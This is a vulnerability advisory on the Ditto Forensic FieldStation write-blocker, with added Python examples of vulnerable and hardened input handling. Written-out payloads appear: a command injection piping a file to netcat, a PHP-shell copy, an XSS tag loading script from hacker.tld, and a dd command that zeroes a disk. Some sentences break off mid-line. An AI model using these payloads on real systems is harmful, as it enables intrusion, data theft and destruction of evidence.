Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities

Title: Ditto Forensic FieldStation, multiple vulnerabilities
Versions affected: <= 2013Oct15a (all)
Vendor: CRU Wiebetech
Discovered by: Martin Wundram
Email: wundram@digitrace.de
Date found:     2013-04-22
Date published: 2013-12-12
Status: partially patched

0] ======== Introduction / Background / Impact ========
In computer forensics (http://en.wikipedia.org/wiki/Computer_forensics) one
essential requirement is that evidence data does not get modified at all (or
at least not unnoticed). Therefore IT forensic experts use write-blockers to
ensure read-only access to evidence data like hard disks or USB mass

The Ditto Forensic FieldStation is such a piece of special equipment (hardware
with embedded software) used by forensic experts to analyse and copy evidence
data in a safe and secure way. The ditto is explicitly marketed as a device to
acquire data from network file shares, too. This means it is meant to be
connected to possibly hostile networks of suspects.

However, it was found to be vulnerable to the point of not being reliable as a
computer forensic device.

1] ======== OS Command Injection ========
Class: Command Injection [CWE-77]
Impact: Code execution
Remotely Exploitable: Yes
CVE Name: CVE-2013-6881
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:

Several input fields of the web application are vulnerable to OS command
injection. E.g. the application allows setting parameters like 'sector size'
or 'skip count' for a forensic imaging task. Because of improper
neutralization of this input, in combination with the web server running with
root privileges, an attacker is able to access and manipulate the complete
system.

Example 1 (setting of 'sector size' = 1 with malicious content):

  1;cat /opt/web/htdocs/index.php | nc 6666;

Example 2 (setting of 'set-size' = 1 with copying a PHP shell from
  the external SD card):

  1;cp /ditto/shell.php /opt/web/htdocs;
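Added example (not the ditto's own code, which is PHP; written in Python to illustrate the pattern behind Example 1): the vulnerable string-building form beside a hardened one that accepts 'sector size' and 'skip count' only as plain integers and hands them to dd as separate argv entries without any shell. The device path, image path and the list of allowed sector sizes are assumptions.

```python
import re
import subprocess

# Allow-listed sector sizes for an imaging task (assumed values, not the
# ditto's own list); device and image paths are placeholders.
ALLOWED_SECTOR_SIZES = {512, 1024, 2048, 4096}
SOURCE_DEV = "/dev/sda"
IMAGE_PATH = "/evidence/image.dd"

def build_command_unsafe(sector_size: str, skip_count: str) -> str:
    """Vulnerable pattern: raw form input is pasted into a shell string.
    Everything after a ';' in sector_size becomes a second command once the
    string reaches /bin/sh, running as the web server user (root on the ditto).
    """
    return f"dd if={SOURCE_DEV} of={IMAGE_PATH} bs={sector_size} skip={skip_count}"

def validate_sector_size(value: str) -> int:
    """Accept only a plain decimal number that is on the allow-list."""
    if not re.fullmatch(r"[0-9]{1,5}", value):
        raise ValueError(f"sector size is not a plain integer: {value!r}")
    size = int(value)
    if size not in ALLOWED_SECTOR_SIZES:
        raise ValueError(f"sector size not allowed: {size}")
    return size

def validate_skip_count(value: str) -> int:
    """Accept only a plain non-negative decimal number."""
    if not re.fullmatch(r"[0-9]{1,15}", value):
        raise ValueError(f"skip count is not a plain integer: {value!r}")
    return int(value)

def build_command_safe(sector_size: str, skip_count: str) -> list:
    """Hardened form: validate first, then build an argv list so that no shell
    parses the parameters and metacharacters cannot split commands."""
    size = validate_sector_size(sector_size)
    skip = validate_skip_count(skip_count)
    return ["dd", f"if={SOURCE_DEV}", f"of={IMAGE_PATH}", f"bs={size}", f"skip={skip}"]

def run_imaging(sector_size: str, skip_count: str) -> int:
    """Start the imaging task without a shell; needs a real source device."""
    return subprocess.run(build_command_safe(sector_size, skip_count), check=False).returncode

def is_injected(command_line: str) -> bool:
    """Reviewer's check on a logged command line: a shell metacharacter inside
    what should be a numeric field indicates an injection attempt."""
    return re.search(r"[;|&`$(){}<>\n]", command_line) is not None
```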

2] ======== Persistent XSS ========
Class: Cross-site Scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Status: unpatched
CVE Name: CVE-2013-6882
CVSS v2 Base Score: 9
Overall CVSS v2 Score (if patched): 9.2
CVSS v2 Vector:
Overall CVSS v2 Score (unpatched): 10

The web application suffers from multiple XSS vulnerabilities. The first one
(a) is critical because an unauthorized attacker is able to push malicious
code into the system and consequently attack every user. The other ones (b)
need authentication first.

a) The web application logs every login (including the username) unsanitized
to a system log. Additionally, the web application embeds that system log,
rendered as HTML, into the start page of every user who successfully logs in.
Thus an unprivileged attacker can persistently inject malicious code which
attacks all users of the vulnerable system immediately after their

b) It is easily possible to submit malicious data as input into multiple HTML
form fields (e.g. one can force the system to load externally hosted
JavaScript code with <script src=http://www.hacker.tld/code.js></script>).
This can result in dangerous situations where the (external) JavaScript code
mangles the information displayed about important computer forensic key values
whose integrity is crucial, for example:

   784 PetaByte (PB) source disk instead of 32 GB, investigator "Al Capone",
   "verify actions: yes" instead of "no", ...
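Added example (a Python illustration, not the ditto's PHP code) of closing flow (a): the login log is written with control characters stripped so that a username cannot forge extra log records, and the rendering step HTML-escapes every line before embedding it in the start page; a Content-Security-Policy header is included as defence in depth against the externally hosted script from (b). The log line format is constructed for this example.

```python
import html
import re

# Assumed log line format (constructed for this example, not the ditto's).
LOG_LINE_FMT = "{ts} login {user} {result}"

def sanitize_log_field(value: str, max_len: int = 64) -> str:
    """Keep one record per line: drop control characters (a newline in the
    username would otherwise forge a second log entry) and bound the length."""
    cleaned = re.sub(r"[\x00-\x1f\x7f]", "", value)
    return cleaned[:max_len]

def log_login(ts: str, username: str, ok: bool) -> str:
    """Build the log record for a login attempt with a sanitized username.
    This prevents log forging only; the text is still untrusted and must be
    escaped again whenever it is rendered as HTML."""
    return LOG_LINE_FMT.format(ts=ts, user=sanitize_log_field(username),
                               result="ok" if ok else "FAILED")

def render_log_unsafe(lines: list) -> str:
    """Vulnerable pattern (a): log text is concatenated into the start page
    as-is, so a failed, unauthenticated login with a <script> username runs
    in the browser of every user who logs in afterwards."""
    return "<pre>" + "\n".join(lines) + "</pre>"

def render_log_safe(lines: list) -> str:
    """Hardened form: every line is HTML-escaped before embedding, so the
    browser shows the payload as text instead of executing it."""
    escaped = (html.escape(line, quote=True) for line in lines)
    return "<pre>" + "\n".join(escaped) + "</pre>"

def csp_header() -> tuple:
    """Defence in depth against (b): forbid scripts from foreign origins so an
    injected <script src=...> does not load even if one escape is missed."""
    return ("Content-Security-Policy", "default-src 'self'; script-src 'self'")

def contains_active_content(page: str) -> bool:
    """Regression check for rendered pages: no raw script/iframe tag and no
    on*= handler may survive from log data."""
    return re.search(r"<script|<iframe|\bon\w+\s*=", page, re.I) is not None

if __name__ == "__main__":
    payload = "<script src=http://www.hacker.tld/code.js></script>"  # from (b)
    entries = [log_login("2013-04-22 10:00", "investigator", True),
               log_login("2013-04-22 10:01", payload, False)]
    print(render_log_unsafe(entries))
    print(render_log_safe(entries))
```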

3] ======== Cross-Site Request Forgery ========
Class: Cross-Site Request Forgery [CWE-352]
Impact: Application misuse
Remotely Exploitable: Yes
CVE Name: CVE-2013-6883
CVSS v2 Base Score: 6.6
Overall CVSS v2 Score: 8
CVSS v2 Vector:

The web application is vulnerable to attacks using Cross-Site Request Forgery.
E.g. the disk erase technique (correct settings are important for the reliable
deletion of sensitive forensic data) can be changed with a simple POST 

4] ======== Misconfigured Daemon Rights ========
Class: Configuration [CWE-16]
Impact: Full system access

The web server lighttpd and the PHP engine run as user 'root'. Thus any
injection weakness in the 'ditto' web application results in immediate full
system access.

5] ======== Unneeded Daemons/Software ========
Class: Configuration [CWE-16]
Impact: Attackable services
Best matching CCE-ID: CCE-4268-9

Forensic usage needs only write-blocking and imaging of evidence data.
However, the base system contains further active software and services, which
helps an attacker to compromise the system and escalate privileges. The
tools/daemons in question are in particular netcat and an active SSHd.
Furthermore, the SSHd binds to the network port which is labeled 'source' and
thus intended for use in supposedly hostile network environments - the network
containing evidence data from suspects.

6] ======== Use of standard credentials ========
Class: Use of Hard-coded Credentials [CWE-798]
Impact: unwanted full system access
Remotely Exploitable: Yes
CVE Name: CVE-2013-6884
CVSS v2 Base Score: 10
Overall CVSS v2 Score: 9.2
CVSS v2 Vector:

The ditto write-blocker contains a default system user named 'ditto' with the
default password 'ditto' which is allowed to elevate its rights to root (sudo)
without further authentication. In combination with the active SSHd, this
vulnerability gives attackers full access to the ditto as soon as it is
connected to the same or a reachable network.

7] ======== Misconfigured Core System ========
Class: Configuration [CWE-16]
Impact: Alteration of evidence data
Remotely Exploitable: Yes

Although explicitly marketed as a hardware write-blocker, the ditto does not
implement any specific write-blocking mechanism at all. The underlying system
is able to manipulate or even erase evidence on devices which are connected to
the 'source side' of the ditto. The problem is: no hardware-level, no driver-
level and no kernel-level (blockdev) write-blocking is implemented. Only the
web application prevents the user from writing to the source media. That is
just security by obscurity. Consequently, every critical weakness or simple
malfunction in the web application can potentially lead to overwriting of
source/evidence data.

Furthermore, the embedded Linux system itself mounts the system partition as
writable. Thus malware could be persistently deployed!

One can simply overwrite supposedly write-protected source data (USB stick,
SATA disk) with

     dd if=/dev/zero of=/dev/sda

8] ======== Solution ========
Upgrade your ditto to the newest available firmware (2013Oct15a). Don't
connect the device to potentially hostile networks. Examine your device for
signs that it has been manipulated at an earlier time (has someone placed a
backdoor in the embedded Linux, or malware which silently manipulates evidence
data or copies of evidence data?).

9] ======== Report Timeline ========
2013-04-22 Discovery of vulnerabilities
2013-04-23 First contact with vendor including agreement about later public
2013-04-26 Detailed information about vulnerabilities provided to vendor
2013-06-30 Vendor fixes some vulnerabilities with firmware 2013Jun30a
2013-10-15 Vendor fixes some vulnerabilities with firmware 2013Oct15a
2013-11-26 Information with details provided to vendor about upcoming public
           disclosure. Vendor gave feedback regarding technical accuracy of
           this report
2013-12-12 Public disclosure

10] ======== Discussion ========
Because integrity is of utmost importance during the forensic process (correct
handling of evidence data and correct deduction of conclusions and
implications), even small vulnerabilities in forensic tools and devices become

11] ======== References ========

Diplom-Wirtschaftsinformatiker Martin G. Wundram

DigiTrace GmbH - Competence in IT Forensics
Managing directors: Alexander Sigel, Martin Wundram
Register court Köln, HR B 72919
VAT ID: DE278529699

Zollstockgürtel 59, 50969 Köln
Phone: 0221-6 77 86 95-0
Website: www.DigiTrace.de
E-mail: info@DigiTrace.de